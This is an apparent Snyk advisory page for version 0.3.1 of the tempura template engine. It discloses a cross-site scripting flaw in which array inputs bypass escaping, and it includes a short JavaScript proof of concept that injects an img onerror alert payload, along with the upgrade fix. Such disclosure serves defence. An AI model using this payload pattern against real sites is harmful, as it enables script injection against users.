Homepage

tempura@0.3.1 vulnerabilities

A light, crispy, and delicious template engine

  • latest version

    0.4.1

  • latest non vulnerable version

    0.4.1

  • first published

    13 years ago

  • latest version published

    1 years ago

  • licenses detected

  • View tempura package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the tempura package. This does not include vulnerabilities belonging to this package’s dependencies.

    Fix vulnerabilities automatically

    Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Cross-site Scripting (XSS)

    tempura is an A light, crispy, and delicious template engine.

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS). If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.

    PoC

    const tempura = require("tempura");

let template = `
    {{#expect name}}
    <p> Hello, {{name}} </p>
`

let render = tempura.compile(template)

let r1 = render({name: "<img src=x onerror='alert(1)' />"})
console.log(r1) // <p> Hello, &ltimg src=x onerror='alert(1)' /> </p>

let r2 = render({name: ["<img src=x onerror='alert(1)' />"]})
console.log(r2) // <p> Hello, <img src=x onerror='alert(1)' /> </p>

    How to fix Cross-site Scripting (XSS)?

    Upgrade tempura to version 0.4.0 or higher.

    <0.4.0
    Go back to all versions of this package